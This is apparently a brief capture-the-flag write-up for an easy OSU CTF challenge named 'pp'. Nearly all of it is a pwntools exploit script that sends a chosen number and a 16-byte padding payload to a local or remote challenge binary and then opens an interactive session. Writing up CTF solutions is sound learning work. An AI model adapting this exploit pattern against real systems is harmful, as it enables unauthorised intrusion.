OSU CTF
pp was an easy challenge: below you can find the exploit for it:
#!/usr/bin/python3
from pwn import *
gs = '''
continue
'''
elf = context.binary = ELF('./challenge')
context.terminal = ['tmux', 'splitw', '-hp', '70']
def start():
if args.GDB:
return gdb.debug('./challenge', gdbscript=gs)
if args.REMOTE:
return remote('chal.osugaming.lol', 7279)
else:
return process('./challenge')
r = start()
#========= exploit here ===================
pp = 727
payload = b"A"*0x10
r.sendlineafter(b"get?", str(pp).encode('ascii'))
r.sendlineafter(b"words?", payload)
#========= interactive ====================
r.interactive()